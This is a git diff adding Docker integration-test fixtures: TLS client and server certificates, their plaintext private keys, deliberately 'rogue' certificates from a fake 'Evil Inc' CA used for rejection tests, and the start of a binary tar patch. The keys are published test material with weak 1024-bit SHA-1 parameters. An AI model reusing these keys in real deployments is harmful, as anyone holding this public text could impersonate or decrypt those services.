+LmRvbWFpbjCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEAyskF0AlOPqT81RT0 +peg002tR4/Ni6qHw6O3EKrzwT8oH3+OI+vQhmTUOPeqwhufE0oqDK0K47KOZYnCB +Rsz8pR3SY+jrByWa4iVtEVbyGlGhtj4cVzLpeyyqG8yXLYktscleNShNfPplMT73 +cN1uCzxYr6guJMB+Tnh9Cp6PQkMCAwEAAaOCAVkwggFVMAkGA1UdEwQCMAAwLQYJ +YIZIAYb4QgENBCAWHkVhc3ktUlNBIEdlbmVyYXRlZCBDZXJ0aWZpY2F0ZTAdBgNV +HQ4EFgQU3kLvLZijbKiq4IxxLJ1kI6nifoEwgdcGA1UdIwSBzzCBzIAUZu7DFz09 +q0QBa2+ymRm9qgK1NPuhgaikgaUwgaIxCzAJBgNVBAYTAlVTMQswCQYDVQQIEwJD +QTEVMBMGA1UEBxMMU2FuRnJhbmNpc2NvMRUwEwYDVQQKEwxGb3J0LUZ1bnN0b24x +ETAPBgNVBAsTCGNoYW5nZW1lMREwDwYDVQQDEwhjaGFuZ2VtZTERMA8GA1UEKRMI +Y2hhbmdlbWUxHzAdBgkqhkiG9w0BCQEWEG1haWxAaG9zdC5kb21haW6CCQD9q+xq +hCcEpzATBgNVHSUEDDAKBggrBgEFBQcDAjALBgNVHQ8EBAMCB4AwDQYJKoZIhvcN +AQEFBQADgYEAHEQm6uFmJcvkjlcc9rkXImJAEpCPO7JhelSUj7EgC7+jUeP6HKG+ +kjrQdkTAV4OrauQaRUmkrzkNYDL8Or7X+12Zeh+H59WrhKJekNi/+oltMiYCXjE1 +aH8x9WtRRryvcO1aCX3sskhP/sUvVgSt9sHSKuRqxIf+CDXFOMteSsQ= +-----END CERTIFICATE----- diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/https/client-key.pem b/vendor/github.com/docker/docker/integration-cli/fixtures/https/client-key.pem new file mode 100644 index 0000000000..b5c15f8dc7 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/fixtures/https/client-key.pem @@ -0,0 +1,16 @@ +-----BEGIN PRIVATE KEY----- +MIICdQIBADANBgkqhkiG9w0BAQEFAASCAl8wggJbAgEAAoGBAMrJBdAJTj6k/NUU +9KXoNNNrUePzYuqh8OjtxCq88E/KB9/jiPr0IZk1Dj3qsIbnxNKKgytCuOyjmWJw +gUbM/KUd0mPo6wclmuIlbRFW8hpRobY+HFcy6XssqhvMly2JLbHJXjUoTXz6ZTE+ +93Ddbgs8WK+oLiTAfk54fQqej0JDAgMBAAECgYBOFEzKp2qbMEexe9ofL2N3rDDh +xkrl8OijpzkLA6i78BxMFn4dsnZlWUpciMrjhsYAExkiRRSS+QMMJimAq1jzQqc3 +FAQV2XGYwkd0cUn7iZGvfNnEPysjsfyYQM+m+sT0ATj4BZjVShC6kkSjTdm1leLN +OSvcHdcu3Xxg9ufF0QJBAPYdnNt5sIndt2WECePuRVi+uF4mlxTobFY0fjn26yhC +4RsnhhD3Vldygo9gvnkwrAZYaALGSPBewes2InxvjA8CQQDS7erKiNXpwoqz5XiU +SVEsIIVTdWzBjGbIqMOu/hUwM5FK4j6JTBks0aTGMyh0YV9L1EzM0X79J29JahCe +iQKNAkBKNMOGqTpBV0hko1sYDk96YobUXG5RL4L6uvkUIQ7mJMQam+AgXXL7Ctuy +v0iu4a38e8tgisiTMP7nHHtpaXihAkAOiN54/lzfMsykANgCP9scE1GcoqbP34Dl +qttxH4kOPT9xzY1JoLjLYdbc4YGUI3GRpBt2sajygNkmUey7P+2xAkBBsVCZFvTw +qHvOpPS2kX5ml5xoc/QAHK9N7kR+X7XFYx82RTVSqJEK4lPb+aEWn+CjiIewO4Q5 +ksDFuNxAzbhl +-----END PRIVATE KEY----- diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/https/client-rogue-cert.pem b/vendor/github.com/docker/docker/integration-cli/fixtures/https/client-rogue-cert.pem new file mode 100644 index 0000000000..21ae4bd579 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/fixtures/https/client-rogue-cert.pem @@ -0,0 +1,73 @@ +Certificate: + Data: + Version: 3 (0x2) + Serial Number: 2 (0x2) + Signature Algorithm: sha1WithRSAEncryption + Issuer: C=US, ST=CA, L=SanFrancisco, O=Evil Inc, OU=changeme, CN=changeme/name=changeme/emailAddress=mail@host.domain + Validity + Not Before: Feb 24 17:54:59 2014 GMT + Not After : Feb 22 17:54:59 2024 GMT + Subject: C=US, ST=CA, L=SanFrancisco, O=Fort-Funston, OU=changeme, CN=client/name=changeme/emailAddress=mail@host.domain + Subject Public Key Info: + Public Key Algorithm: rsaEncryption + Public-Key: (1024 bit) + Modulus: + 00:e8:e2:2c:b8:d4:db:89:50:4f:47:1e:68:db:f7: + e4:cc:47:41:63:75:03:37:50:7a:a8:4d:27:36:d5: + 15:01:08:b6:cf:56:f7:56:6d:3d:f9:e2:8d:1a:5d: + bf:a0:24:5e:07:55:8e:d0:dc:f1:fa:19:87:1d:d6: + b6:58:82:2e:ba:69:6d:e9:d9:c8:16:0d:1d:59:7f: + f4:8e:58:10:01:3d:21:14:16:3c:ec:cd:8c:b7:0e: + e6:7b:77:b4:f9:90:a5:17:01:bb:84:c6:b2:12:87: + 70:eb:9f:6d:4f:d0:68:8b:96:c0:e7:0b:51:b4:9d: + 1d:7b:6c:7b:be:89:6b:88:8b + Exponent: 65537 (0x10001) + X509v3 extensions: + X509v3 Basic Constraints: + CA:FALSE + Netscape Comment: + Easy-RSA Generated Certificate + X509v3 Subject Key Identifier: + 9E:F8:49:D0:A2:76:30:5C:AB:2B:8A:B5:8D:C6:45:1F:A7:F8:CF:85 + X509v3 Authority Key Identifier: + keyid:DC:A5:F1:76:DB:4E:CD:8E:EF:B1:23:56:1D:92:80:99:74:3B:EA:6F + DirName:/C=US/ST=CA/L=SanFrancisco/O=Evil Inc/OU=changeme/CN=changeme/name=changeme/emailAddress=mail@host.domain + serial:E7:21:1E:18:41:1B:96:83 + + X509v3 Extended Key Usage: + TLS Web Client Authentication + X509v3 Key Usage: + Digital Signature + Signature Algorithm: sha1WithRSAEncryption + 48:76:c0:18:fa:0a:ee:4e:1a:ec:02:9d:d4:83:ca:94:54:a1: + 3f:51:2f:3e:4b:95:c3:42:9b:71:a0:4b:d9:af:47:23:b9:1c: + fb:85:ba:76:e2:09:cb:65:bb:d2:7d:44:3d:4b:67:ba:80:83: + be:a8:ed:c4:b9:ea:1a:1b:c7:59:3b:d9:5c:0d:46:d8:c9:92: + cb:10:c5:f2:1a:38:a4:aa:07:2c:e3:84:16:79:c7:95:09:e3: + 01:d2:15:a2:77:0b:8b:bf:94:04:e9:7f:c0:cd:e6:2e:64:cd: + 1e:a3:32:ec:11:cc:62:ce:c7:4e:cd:ad:48:5c:b1:b8:e9:76: + b3:f9 +-----BEGIN CERTIFICATE----- +MIIEDTCCA3agAwIBAgIBAjANBgkqhkiG9w0BAQUFADCBnjELMAkGA1UEBhMCVVMx +CzAJBgNVBAgTAkNBMRUwEwYDVQQHEwxTYW5GcmFuY2lzY28xETAPBgNVBAoTCEV2 +aWwgSW5jMREwDwYDVQQLEwhjaGFuZ2VtZTERMA8GA1UEAxMIY2hhbmdlbWUxETAP +BgNVBCkTCGNoYW5nZW1lMR8wHQYJKoZIhvcNAQkBFhBtYWlsQGhvc3QuZG9tYWlu +MB4XDTE0MDIyNDE3NTQ1OVoXDTI0MDIyMjE3NTQ1OVowgaAxCzAJBgNVBAYTAlVT +MQswCQYDVQQIEwJDQTEVMBMGA1UEBxMMU2FuRnJhbmNpc2NvMRUwEwYDVQQKEwxG +b3J0LUZ1bnN0b24xETAPBgNVBAsTCGNoYW5nZW1lMQ8wDQYDVQQDEwZjbGllbnQx +ETAPBgNVBCkTCGNoYW5nZW1lMR8wHQYJKoZIhvcNAQkBFhBtYWlsQGhvc3QuZG9t +YWluMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDo4iy41NuJUE9HHmjb9+TM +R0FjdQM3UHqoTSc21RUBCLbPVvdWbT354o0aXb+gJF4HVY7Q3PH6GYcd1rZYgi66 +aW3p2cgWDR1Zf/SOWBABPSEUFjzszYy3DuZ7d7T5kKUXAbuExrISh3Drn21P0GiL +lsDnC1G0nR17bHu+iWuIiwIDAQABo4IBVTCCAVEwCQYDVR0TBAIwADAtBglghkgB +hvhCAQ0EIBYeRWFzeS1SU0EgR2VuZXJhdGVkIENlcnRpZmljYXRlMB0GA1UdDgQW +BBSe+EnQonYwXKsrirWNxkUfp/jPhTCB0wYDVR0jBIHLMIHIgBTcpfF2207Nju+x +I1YdkoCZdDvqb6GBpKSBoTCBnjELMAkGA1UEBhMCVVMxCzAJBgNVBAgTAkNBMRUw +EwYDVQQHEwxTYW5GcmFuY2lzY28xETAPBgNVBAoTCEV2aWwgSW5jMREwDwYDVQQL +EwhjaGFuZ2VtZTERMA8GA1UEAxMIY2hhbmdlbWUxETAPBgNVBCkTCGNoYW5nZW1l +MR8wHQYJKoZIhvcNAQkBFhBtYWlsQGhvc3QuZG9tYWluggkA5yEeGEEbloMwEwYD +VR0lBAwwCgYIKwYBBQUHAwIwCwYDVR0PBAQDAgeAMA0GCSqGSIb3DQEBBQUAA4GB +AEh2wBj6Cu5OGuwCndSDypRUoT9RLz5LlcNCm3GgS9mvRyO5HPuFunbiCctlu9J9 +RD1LZ7qAg76o7cS56hobx1k72VwNRtjJkssQxfIaOKSqByzjhBZ5x5UJ4wHSFaJ3 +C4u/lATpf8DN5i5kzR6jMuwRzGLOx07NrUhcsbjpdrP5 +-----END CERTIFICATE----- diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/https/client-rogue-key.pem b/vendor/github.com/docker/docker/integration-cli/fixtures/https/client-rogue-key.pem new file mode 100644 index 0000000000..53c122ab70 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/fixtures/https/client-rogue-key.pem @@ -0,0 +1,16 @@ +-----BEGIN PRIVATE KEY----- +MIICdgIBADANBgkqhkiG9w0BAQEFAASCAmAwggJcAgEAAoGBAOjiLLjU24lQT0ce +aNv35MxHQWN1AzdQeqhNJzbVFQEIts9W91ZtPfnijRpdv6AkXgdVjtDc8foZhx3W +tliCLrppbenZyBYNHVl/9I5YEAE9IRQWPOzNjLcO5nt3tPmQpRcBu4TGshKHcOuf +bU/QaIuWwOcLUbSdHXtse76Ja4iLAgMBAAECgYADs+TmI2xCKKa6CL++D5jxrohZ +nnionnz0xBVFh+nHlG3jqgxQsXf0yydXLfpn/2wHTdLxezHVuiYt0UYg7iD0CglW ++IjcgMebzyjLeYqYOE5llPlMvhp2HoEMYJNb+7bRrZ1WCITbu+Su0w1cgA7Cs+Ej +VlfvGzN+qqnDThRUYQJBAPY0sMWZJKly8QhUmUvmcXdPczzSOf6Mm7gc5LR6wzxd +vW7syuqk50qjqVqFpN81vCV7GoDxRUWbTM9ftf7JGFkCQQDyJc/1RMygE2o+enU1 +6UBxJyclXITEYtDn8aoEpLNc7RakP1WoPUKjZOnjkcoKcIkFNkSPeCfQujrb5f3F +MkuDAkByAI/hzzmkpK5rFxEsjfX4Mve/L/DepyjrpaVY1IdWimlO1aJX6CeY7hNa +8QsYt/74s/nfvtg+lNyKIV1aLq9xAkB+WSSNgfyTeg3x08vc+Xxajmdqoz/TiQwg +OoTQL3A3iK5LvZBgXLasszcnOycFE3srcQmNItEDpGiZ3QPxJTEpAkEA45EE9NMJ +SA7EGWSFlbz4f4u4oBeiDiJRJbGGfAyVxZlpCWUjPpg9+swsWoFEOjnGYaChAMk5 +nrOdMf15T6QF7Q== +-----END PRIVATE KEY----- diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/https/server-cert.pem b/vendor/github.com/docker/docker/integration-cli/fixtures/https/server-cert.pem new file mode 100644 index 0000000000..08abfd1a3b --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/fixtures/https/server-cert.pem @@ -0,0 +1,76 @@ +Certificate: + Data: + Version: 3 (0x2) + Serial Number: 4 (0x4) + Signature Algorithm: sha1WithRSAEncryption + Issuer: C=US, ST=CA, L=SanFrancisco, O=Fort-Funston, OU=changeme, CN=changeme/name=changeme/emailAddress=mail@host.domain + Validity + Not Before: Dec 4 15:01:20 2013 GMT + Not After : Dec 2 15:01:20 2023 GMT + Subject: C=US, ST=CA, L=SanFrancisco, O=Fort-Funston, OU=changeme, CN=*/name=changeme/emailAddress=mail@host.domain + Subject Public Key Info: + Public Key Algorithm: rsaEncryption + Public-Key: (1024 bit) + Modulus: + 00:c1:ff:7d:30:6f:64:4a:b1:92:b1:71:d1:c1:74: + e2:1d:db:2d:11:24:e1:00:d4:00:ae:6f:c8:9e:ae: + 67:b3:4a:bd:f7:e6:9e:57:6d:19:4c:3c:23:94:2d: + 3d:d6:63:84:d8:fa:76:2b:38:12:c1:ed:20:9d:32: + e0:e8:c2:bf:9a:77:70:04:3f:7f:ca:8c:2c:82:d6: + 3d:25:5c:02:1a:4f:64:93:03:dd:9c:42:97:5e:09: + 49:af:f0:c2:e1:30:08:0e:21:46:95:d1:13:59:c0: + c8:76:be:94:0d:8b:43:67:21:33:b2:08:60:9d:76: + a8:05:32:1e:f9:95:09:14:75 + Exponent: 65537 (0x10001) + X509v3 extensions: + X509v3 Basic Constraints: + CA:FALSE + Netscape Cert Type: + SSL Server + Netscape Comment: + Easy-RSA Generated Server Certificate + X509v3 Subject Key Identifier: + 14:02:FD:FD:DD:13:38:E0:71:EA:D1:BE:C0:0E:89:1A:2D:B6:19:06 + X509v3 Authority Key Identifier: + keyid:66:EE:C3:17:3D:3D:AB:44:01:6B:6F:B2:99:19:BD:AA:02:B5:34:FB + DirName:/C=US/ST=CA/L=SanFrancisco/O=Fort-Funston/OU=changeme/CN=changeme/name=changeme/emailAddress=mail@host.domain + serial:FD:AB:EC:6A:84:27:04:A7 + + X509v3 Extended Key Usage: + TLS Web Server Authentication + X509v3 Key Usage: + Digital Signature, Key Encipherment + Signature Algorithm: sha1WithRSAEncryption + 40:0f:10:39:c4:b7:0f:0d:2f:bf:d2:16:cc:8e:d3:9a:fb:8b: + ce:4b:7b:0d:48:77:ce:f1:fe:d5:8f:ea:b1:71:ed:49:1d:9f: + 23:3a:16:d4:70:7c:c5:29:bf:e4:90:34:d0:f0:00:24:f4:e4: + df:2c:c3:83:01:66:61:c9:a8:ab:29:e7:98:6d:27:89:4a:76: + c9:2e:19:8e:fe:6e:d5:f8:99:11:0e:97:67:4b:34:e3:1e:e3: + 9f:35:00:a5:32:f9:b5:2c:f2:e0:c5:2e:cc:81:bd:18:dd:5c: + 12:c8:6b:fa:0c:17:74:30:55:f6:6e:20:9a:6c:1e:09:b4:0c: + 15:42 +-----BEGIN CERTIFICATE----- +MIIEKjCCA5OgAwIBAgIBBDANBgkqhkiG9w0BAQUFADCBojELMAkGA1UEBhMCVVMx +CzAJBgNVBAgTAkNBMRUwEwYDVQQHEwxTYW5GcmFuY2lzY28xFTATBgNVBAoTDEZv +cnQtRnVuc3RvbjERMA8GA1UECxMIY2hhbmdlbWUxETAPBgNVBAMTCGNoYW5nZW1l +MREwDwYDVQQpEwhjaGFuZ2VtZTEfMB0GCSqGSIb3DQEJARYQbWFpbEBob3N0LmRv +bWFpbjAeFw0xMzEyMDQxNTAxMjBaFw0yMzEyMDIxNTAxMjBaMIGbMQswCQYDVQQG +EwJVUzELMAkGA1UECBMCQ0ExFTATBgNVBAcTDFNhbkZyYW5jaXNjbzEVMBMGA1UE +ChMMRm9ydC1GdW5zdG9uMREwDwYDVQQLEwhjaGFuZ2VtZTEKMAgGA1UEAxQBKjER +MA8GA1UEKRMIY2hhbmdlbWUxHzAdBgkqhkiG9w0BCQEWEG1haWxAaG9zdC5kb21h +aW4wgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAMH/fTBvZEqxkrFx0cF04h3b +LREk4QDUAK5vyJ6uZ7NKvffmnldtGUw8I5QtPdZjhNj6dis4EsHtIJ0y4OjCv5p3 +cAQ/f8qMLILWPSVcAhpPZJMD3ZxCl14JSa/wwuEwCA4hRpXRE1nAyHa+lA2LQ2ch +M7IIYJ12qAUyHvmVCRR1AgMBAAGjggFzMIIBbzAJBgNVHRMEAjAAMBEGCWCGSAGG ++EIBAQQEAwIGQDA0BglghkgBhvhCAQ0EJxYlRWFzeS1SU0EgR2VuZXJhdGVkIFNl +cnZlciBDZXJ0aWZpY2F0ZTAdBgNVHQ4EFgQUFAL9/d0TOOBx6tG+wA6JGi22GQYw +gdcGA1UdIwSBzzCBzIAUZu7DFz09q0QBa2+ymRm9qgK1NPuhgaikgaUwgaIxCzAJ +BgNVBAYTAlVTMQswCQYDVQQIEwJDQTEVMBMGA1UEBxMMU2FuRnJhbmNpc2NvMRUw +EwYDVQQKEwxGb3J0LUZ1bnN0b24xETAPBgNVBAsTCGNoYW5nZW1lMREwDwYDVQQD +EwhjaGFuZ2VtZTERMA8GA1UEKRMIY2hhbmdlbWUxHzAdBgkqhkiG9w0BCQEWEG1h +aWxAaG9zdC5kb21haW6CCQD9q+xqhCcEpzATBgNVHSUEDDAKBggrBgEFBQcDATAL +BgNVHQ8EBAMCBaAwDQYJKoZIhvcNAQEFBQADgYEAQA8QOcS3Dw0vv9IWzI7TmvuL +zkt7DUh3zvH+1Y/qsXHtSR2fIzoW1HB8xSm/5JA00PAAJPTk3yzDgwFmYcmoqynn +mG0niUp2yS4Zjv5u1fiZEQ6XZ0s04x7jnzUApTL5tSzy4MUuzIG9GN1cEshr+gwX +dDBV9m4gmmweCbQMFUI= +-----END CERTIFICATE----- diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/https/server-key.pem b/vendor/github.com/docker/docker/integration-cli/fixtures/https/server-key.pem new file mode 100644 index 0000000000..c269320ef0 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/fixtures/https/server-key.pem @@ -0,0 +1,16 @@ +-----BEGIN PRIVATE KEY----- +MIICeAIBADANBgkqhkiG9w0BAQEFAASCAmIwggJeAgEAAoGBAMH/fTBvZEqxkrFx +0cF04h3bLREk4QDUAK5vyJ6uZ7NKvffmnldtGUw8I5QtPdZjhNj6dis4EsHtIJ0y +4OjCv5p3cAQ/f8qMLILWPSVcAhpPZJMD3ZxCl14JSa/wwuEwCA4hRpXRE1nAyHa+ +lA2LQ2chM7IIYJ12qAUyHvmVCRR1AgMBAAECgYAmwckb9RUfSwyYgLm8IYLPHiuJ +wkllZfVg5Bo7gXJcQnFjZmJ56uTj8xvUjZlODIHM63TSO5ibv6kFXtXKCqZGd2M+ +wGbhZ0f+2GvKcwMmJERnIQjuoNaYSQLT0tM0VB9Iz0rJlZC+tzPZ+5pPqEumRdsS +IzWNXfF42AhcbwAQYQJBAPVXtMYIJc9EZsz86ZcQiMPWUpCX5vnRmtwL8kKyR8D5 +4KfYeiowyFffSRMMcclwNHq7TgSXN+nIXM9WyzyzwikCQQDKbNA28AgZp9aT54HP +WnbeE2pmt+uk/zl/BtxJSoK6H+69Jec+lf7EgL7HgOWYRSNot4uQWu8IhsHLTiUq ++0FtAkEAqwlRxRy4/x24bP+D+QRV0/D97j93joFJbE4Hved7jlSlAV4xDGilwlyv +HNB4Iu5OJ6Gcaibhm+FKkmD3noHSwQJBAIpu3fokLzX0bS+bDFBU6qO3HXX/47xj ++tsfQvkwZrSI8AkU6c8IX0HdVhsz0FBRQAT2ORDQz1XCarfxykNZrwUCQQCGCBIc +BBCWzhHlswlGidWJg3HqqO6hPPClEr3B5G87oCsdeYwiO23XT6rUnoJXfJHp6oCW +5nCwDu5ZTP+khltg +-----END PRIVATE KEY----- diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/https/server-rogue-cert.pem b/vendor/github.com/docker/docker/integration-cli/fixtures/https/server-rogue-cert.pem new file mode 100644 index 0000000000..28feba6656 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/fixtures/https/server-rogue-cert.pem @@ -0,0 +1,76 @@ +Certificate: + Data: + Version: 3 (0x2) + Serial Number: 3 (0x3) + Signature Algorithm: sha1WithRSAEncryption + Issuer: C=US, ST=CA, L=SanFrancisco, O=Evil Inc, OU=changeme, CN=changeme/name=changeme/emailAddress=mail@host.domain + Validity + Not Before: Feb 28 18:49:31 2014 GMT + Not After : Feb 26 18:49:31 2024 GMT + Subject: C=US, ST=CA, L=SanFrancisco, O=Fort-Funston, OU=changeme, CN=localhost/name=changeme/emailAddress=mail@host.domain + Subject Public Key Info: + Public Key Algorithm: rsaEncryption + Public-Key: (1024 bit) + Modulus: + 00:d1:08:58:24:60:a1:69:65:4b:76:46:8f:88:75: + 7c:49:3a:d8:03:cc:5b:58:c5:d1:bb:e5:f9:54:b9: + 75:65:df:7e:bb:fb:54:d4:b2:e9:6f:58:a2:a4:84: + 43:94:77:24:81:38:36:36:f0:66:65:26:e5:5b:2a: + 14:1c:a9:ae:57:7f:75:00:23:14:4b:61:58:e4:82: + aa:15:97:94:bd:50:35:0d:5d:18:18:ed:10:6a:bb: + d3:64:5a:eb:36:98:5b:58:a7:fe:67:48:c1:6c:3f: + 51:2f:02:65:96:54:77:9b:34:f9:a7:d2:63:54:6a: + 9e:02:5c:be:65:98:a4:b4:b5 + Exponent: 65537 (0x10001) + X509v3 extensions: + X509v3 Basic Constraints: + CA:FALSE + Netscape Cert Type: + SSL Server + Netscape Comment: + Easy-RSA Generated Server Certificate + X509v3 Subject Key Identifier: + 1F:E0:57:CA:CB:76:C9:C4:86:B9:EA:69:17:C0:F3:51:CE:95:40:EC + X509v3 Authority Key Identifier: + keyid:DC:A5:F1:76:DB:4E:CD:8E:EF:B1:23:56:1D:92:80:99:74:3B:EA:6F + DirName:/C=US/ST=CA/L=SanFrancisco/O=Evil Inc/OU=changeme/CN=changeme/name=changeme/emailAddress=mail@host.domain + serial:E7:21:1E:18:41:1B:96:83 + + X509v3 Extended Key Usage: + TLS Web Server Authentication + X509v3 Key Usage: + Digital Signature, Key Encipherment + Signature Algorithm: sha1WithRSAEncryption + 04:93:0e:28:01:94:18:f0:8c:7c:d3:0c:ad:e9:b7:46:b1:30: + 65:ed:68:7c:8c:91:cd:1a:86:66:87:4a:4f:c0:97:bc:f7:85: + 4b:38:79:31:b2:65:88:b1:76:16:9e:80:93:38:f4:b9:eb:65: + 00:6d:bb:89:e0:a1:bf:95:5e:80:13:8e:01:73:d3:f1:08:73: + 85:a5:33:75:0b:42:8a:a3:07:09:35:ef:d7:c6:58:eb:60:a3: + 06:89:a0:53:99:e2:aa:41:90:e0:1a:d2:12:4b:48:7d:c3:9c: + ad:bd:0e:5e:5f:f7:09:0c:5d:7c:86:24:dd:92:d5:b3:14:06: + c7:9f +-----BEGIN CERTIFICATE----- +MIIEKjCCA5OgAwIBAgIBAzANBgkqhkiG9w0BAQUFADCBnjELMAkGA1UEBhMCVVMx +CzAJBgNVBAgTAkNBMRUwEwYDVQQHEwxTYW5GcmFuY2lzY28xETAPBgNVBAoTCEV2 +aWwgSW5jMREwDwYDVQQLEwhjaGFuZ2VtZTERMA8GA1UEAxMIY2hhbmdlbWUxETAP +BgNVBCkTCGNoYW5nZW1lMR8wHQYJKoZIhvcNAQkBFhBtYWlsQGhvc3QuZG9tYWlu +MB4XDTE0MDIyODE4NDkzMVoXDTI0MDIyNjE4NDkzMVowgaMxCzAJBgNVBAYTAlVT +MQswCQYDVQQIEwJDQTEVMBMGA1UEBxMMU2FuRnJhbmNpc2NvMRUwEwYDVQQKEwxG +b3J0LUZ1bnN0b24xETAPBgNVBAsTCGNoYW5nZW1lMRIwEAYDVQQDEwlsb2NhbGhv +c3QxETAPBgNVBCkTCGNoYW5nZW1lMR8wHQYJKoZIhvcNAQkBFhBtYWlsQGhvc3Qu +ZG9tYWluMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDRCFgkYKFpZUt2Ro+I +dXxJOtgDzFtYxdG75flUuXVl3367+1TUsulvWKKkhEOUdySBODY28GZlJuVbKhQc +qa5Xf3UAIxRLYVjkgqoVl5S9UDUNXRgY7RBqu9NkWus2mFtYp/5nSMFsP1EvAmWW +VHebNPmn0mNUap4CXL5lmKS0tQIDAQABo4IBbzCCAWswCQYDVR0TBAIwADARBglg +hkgBhvhCAQEEBAMCBkAwNAYJYIZIAYb4QgENBCcWJUVhc3ktUlNBIEdlbmVyYXRl +ZCBTZXJ2ZXIgQ2VydGlmaWNhdGUwHQYDVR0OBBYEFB/gV8rLdsnEhrnqaRfA81HO +lUDsMIHTBgNVHSMEgcswgciAFNyl8XbbTs2O77EjVh2SgJl0O+pvoYGkpIGhMIGe +MQswCQYDVQQGEwJVUzELMAkGA1UECBMCQ0ExFTATBgNVBAcTDFNhbkZyYW5jaXNj +bzERMA8GA1UEChMIRXZpbCBJbmMxETAPBgNVBAsTCGNoYW5nZW1lMREwDwYDVQQD +EwhjaGFuZ2VtZTERMA8GA1UEKRMIY2hhbmdlbWUxHzAdBgkqhkiG9w0BCQEWEG1h +aWxAaG9zdC5kb21haW6CCQDnIR4YQRuWgzATBgNVHSUEDDAKBggrBgEFBQcDATAL +BgNVHQ8EBAMCBaAwDQYJKoZIhvcNAQEFBQADgYEABJMOKAGUGPCMfNMMrem3RrEw +Ze1ofIyRzRqGZodKT8CXvPeFSzh5MbJliLF2Fp6Akzj0uetlAG27ieChv5VegBOO +AXPT8QhzhaUzdQtCiqMHCTXv18ZY62CjBomgU5niqkGQ4BrSEktIfcOcrb0OXl/3 +CQxdfIYk3ZLVsxQGx58= +-----END CERTIFICATE----- diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/https/server-rogue-key.pem b/vendor/github.com/docker/docker/integration-cli/fixtures/https/server-rogue-key.pem new file mode 100644 index 0000000000..10f7c65001 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/fixtures/https/server-rogue-key.pem @@ -0,0 +1,16 @@ +-----BEGIN PRIVATE KEY----- +MIICdgIBADANBgkqhkiG9w0BAQEFAASCAmAwggJcAgEAAoGBANEIWCRgoWllS3ZG +j4h1fEk62APMW1jF0bvl+VS5dWXffrv7VNSy6W9YoqSEQ5R3JIE4NjbwZmUm5Vsq +FByprld/dQAjFEthWOSCqhWXlL1QNQ1dGBjtEGq702Ra6zaYW1in/mdIwWw/US8C +ZZZUd5s0+afSY1RqngJcvmWYpLS1AgMBAAECgYAJXh9dGfuB1qlIFqduDR3RxlJR +8UGSu+LHUeoXkuwg8aAjWoMVuSLe+5DmYIsKx0AajmNXmPRtyg1zRXJ7SltmubJ8 +6qQVDsRk6biMdkpkl6a9Gk2av40psD9/VPGxagEoop7IKYhf3AeKPvPiwVB2qFrl +1aYMZm0aMR55pgRajQJBAOk8IsJDf0beooDZXVdv/oe4hcbM9fxO8Cn3qzoGImqD +37LL+PCzDP7AEV3fk43SsZDeSk+LDX+h0o9nPyhzHasCQQDlb3aDgcQY9NaGLUWO +moOCB3148eBVcAwCocu+OSkf7sbQdvXxgThBOrZl11wwRIMQqh99c2yeUwj+tELl +3VcfAkBZTiNpCvtDIaBLge9RuZpWUXs3wec2cutWxnSTxSGMc25GQf/R+l0xdk2w +ChmvpktDUzpU9sN2aXn8WuY+EMX9AkEApbLpUbKPUELLB958RLA819TW/lkZXjrs +wZ3eSoR3ufM1rOqtVvyvBxUDE+wETWu9iHSFB5Ir2PA5J9JCGkbPmwJAFI1ndfBj +iuyU93nFX0p+JE2wVHKx4dMzKCearNKiJh/lGDtUq3REGgamTNUnG8RAITUbxFs+ +Z1hrIq8xYl2LOQ== +-----END PRIVATE KEY----- diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/load/emptyLayer.tar b/vendor/github.com/docker/docker/integration-cli/fixtures/load/emptyLayer.tar new file mode 100644 index 0000000000000000000000000000000000000000..beabb569ac1e7fea69848f79ffd77fb17b2487b0 GIT binary patch literal 30720 zcmeI4ZExeo5y$c* zovW*2`my-BS#-6VC#(TWylUoH;FtY>E>gSBdD(R?T)*vNRTtCjW{dQq*rhc~JiEJz zsl`J#iI?4n-S>-|RPWcb+PkO&p2Vj7>-wi+S}$j_7sXd|yt?(*H*av1 z+nj$j?T=M`^{U#O?d!U0Kio7`Pi=kdMg6yBHQQD7cjwb=bNHthMQp;4h~=l$E~*AE zuwWB8>5;iMTvuHR-Lmal{@LpHT4MUleZcZ73oou6S9)q>^d-k>oX_}Qcxyo^p;T#I z4yBjEs}MP78A@rGh|&6(B$v4q&IKEaPbcYiRLK(|Fm&Lbue#U-=g_}>K?m>u=o9SE z|2Wfh|Nm{EC(M}~AUk1=_?|0jAs(MS-F>HlGq1Fv!G%u}F zxq~RdI2NK#f|*#Nn~(V{vFLOO8UqEuV@wWH0lWbP;+XE!kN?B|zvfDCV+{KLI33XJ zG420+{r|!CKbik8jnddl(C`@lF&t?A{}{IbApid{FhAKg29N*Y{y*OI0q1{v<6mif z{ttd8A4C0_$Nx6||IluLzUGZ<*Y1BAOzlPXfBaM3-28d; z^3|(Ru4ZY9j6K(!m62PF7=SBvvY>6u9_MkwI>$54a7OCT$T3-m=lJE( zmUnm}hhi;&u@=Bq+_JlF`T)-5bsBwzUH;iw#FV;!sB`|AkTbLnLJ;j*XJ0q(@q+&r#AY7K_tidj`Je@64Y zt^SAcHvH+*phv{y_9nO&aXZ27@H1gNA7uuCn|I7u4AJ4h5%>!(#?o4@01sM9=?Y<}U-wbn}~IT=+q) zpnU-y`(0?Hj|bqk-Cup*+8>Y5g-CYfCvx)B0vO)01+SpM1Tko z0U|&IhyW2F0z`la5CI}U1c(3;cp3zTzMXo^%Y*&eXctdy*>?6A8Sq zp|r}Cz7&k%LWj}|qk_p@3pT0=6BEu*_dHZBTzvXOYO{wlC)G^^hyW2F0z`la5CI}U 